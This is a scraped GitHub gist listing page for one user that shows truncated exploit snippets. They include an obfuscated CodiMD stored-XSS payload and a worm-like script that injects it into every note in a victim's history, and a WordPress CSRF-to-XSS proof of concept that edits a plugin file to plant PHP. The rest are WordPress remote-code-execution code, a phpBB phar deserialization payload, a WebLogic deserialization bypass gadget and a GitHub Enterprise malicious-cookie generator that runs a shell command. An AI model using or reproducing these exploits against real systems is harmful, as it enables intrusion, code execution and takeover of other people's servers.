Skip to content

Instantly share code, notes, and snippets.

Ali allyshka

Block or report user

Report or block allyshka

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@allyshka
allyshka / xss-payload.js
Created Apr 25, 2019
CodiMD > 1.3.0 XSS payload
View xss-payload.js
<!-- attr="-->
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js>
</script>
<div ng-app>
{{constructor.constructor('eval(atob(\'dmFyIGhvc3Q9ZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUrIjoiK2RvY3VtZW50LmxvY2F0aW9uLnBvcnQsbm90ZWR1bW15PSIvLyIraG9zdCsiL3NvY2tldC5pby8/bm90ZUlkPU5PVEVfSUQmRUlPPTMiLHBheWxvYWQ9Ilx4M2MhLS0gYXR0cj1cIi0tXHgzZTxzY3JpcHQgc3JjPWh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2FuZ3VsYXIuanMvMS4wLjEvYW5ndWxhci5taW4uanM+PFwvc2NyaXB0PjxkaXYgbmctYXBwPnt7Y29uc3RydWN0b3IuY29uc3RydWN0b3IoJ2FsZXJ0KDEpJykoKX19PC9kaXY+XCIgLS1ceDNlXG4iOyQuZ2V0KCIvbWUiLGZ1bmN0aW9uKG8peyJvayI9PW8uc3RhdHVzJiYkLmdldCgiL2hpc3RvcnkiLGZ1bmN0aW9uKG8pe2lmKDA8by5oaXN0b3J5Lmxlbmd0aClmb3IoaCBpbiBvLmhpc3RvcnkpeyFmdW5jdGlvbihvKXt2YXIgdD1pby5jb25uZWN0KHtwYXRoOiIvc29ja2V0LmlvLyIscXVlcnk6e25vdGVJZDpvfSx0aW1lb3V0OjVlMyxyZWNvbm5lY3Rpb25BdHRlbXB0czoyMCxmb3JjZU5ldzohMH0pO3Qub24oImNvbm5lY3QiLGZ1bmN0aW9uKG8pe30pLHQub25jZSgiZG9jIixmdW5jdGlvbihvKXtjb25zb2xlLmxvZyhvLnN0ciksLTE9PW8uc3RyLnNlYXJjaCgibmctYXBwIikmJnQuZW1
@allyshka
allyshka / codimd-notes-poison.js
Created Apr 25, 2019
CodiMD > 1.3.0 add XSS to all user notes from history
View codimd-notes-poison.js
var host = document.location.hostname + ':' + document.location.port;
var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3';
var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n';
$.get('/me', function(data){
if(data.status=="ok") {
$.get('/history', function(data) {
if(data.history.length > 0) {
for(h in data.history) {
var currentNoteId = data.history[h].id;
@allyshka
allyshka / csrf.html
Last active Apr 28, 2019
Wordpress <=5.1 PoC Akismet plugin index.php edit through CSRF
View csrf.html
<html>
<body>
<form action="http://wpxss.vh/wp-comments-post.php" method="POST">
<input type="text" name="comment" value="&lt;a title=&apos;xss&quot; style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob(&quot;dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld
@allyshka
allyshka / akismet-xss-edit.js
Created Apr 10, 2019
Wordpress Akismet plugin index.php edit
View akismet-xss-edit.js
var exploit = function() {
var nonce = '';
var phpcode = '<?php phpinfo();/*';
var pluginurl = '/wp-admin/plugin-editor.php?plugin=akismet/index.php&Submit=Select';
var pluginupdateurl = '/wp-admin/admin-ajax.php';
var file = "akismet/index.php";
var plugin = "akismet/akismet.php";
console.log("Get nonce token.");
jQuery.get(pluginurl, function(data) {
nonce = jQuery(data).find('#template #nonce').val();
@allyshka
allyshka / wordpress-rce.js
Created Mar 1, 2019
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
View wordpress-rce.js
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
@allyshka
allyshka / poc.js
Created Dec 12, 2018
phpBB <= 3.2.3 Admin to RCE PoC
View poc.js
// All greets goes to RIPS Tech
// Run this JS on Attachment Settings ACP page
var plupload_salt = '';
var form_token = '';
var creation_time = '';
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip
// your payload here
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00
@allyshka
allyshka / JRMPClient_20180718_bypass01.java
Created Oct 25, 2018
CVE-2018-3245: JRMPClient payload for bypass CVE-2018-2628 patch
View JRMPClient_20180718_bypass01.java
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
@allyshka
allyshka / script-loader.calls
Created Apr 5, 2018
All add method calls from script-loader.php
View script-loader.calls
070: $scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" );
...
078: $scripts->add( 'common', "/wp-admin/js/common$suffix.js", array('jquery', 'hoverIntent', 'utils'), false, 1 );
...
086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 );
...
088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 );
...
090: $scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 );
...
@allyshka
allyshka / gitentcookiegen.rb
Created Mar 22, 2017
GitHub Enterprise 2.8.0 < 2.8.6 evil cookie generator
View gitentcookiegen.rb
require "openssl"
require "cgi"
SECRET = "641dd6454584ddabfed6342cc66281fb"
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
cmd = "uname -a > /tmp/owned" # change me
erubis = Erubis::Eruby.allocate
@allyshka
allyshka / gitentcookiedecrypt.rb
Last active Mar 9, 2019
GitHub Enterprise cookie decryption with default secret key
View gitentcookiedecrypt.rb
require "cgi"
require "openssl"
cookie = "BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRWU4ZGJiNDcxM2M5Nzk1NTE1NzBm%0AYjNiOWQzNDczYjZiMzYzY2Q2ODE5ZjcxNjI0ZDk3YzY4YzQwMmM5ZTliZmYG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFWVVArTFRXd0Npd0tTVDBaNlZzNDVC%0AekYzdndXd3lUa0UrMzBYcUNCM3RZPQY7AEY%3D%0A--229b711211f74793d491e5b57effeb81a042b5b9"
cookie = cookie.split("--")
data = CGI.unescape(cookie.first)
loaddata = data.unpack('m').first
hmac = cookie.last
secret = "641dd6454584ddabfed6342cc66281fb"
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
print "Hash comparing: ", expected_hmac, " == ", hmac, "\r\n"
You can’t perform that action at this time.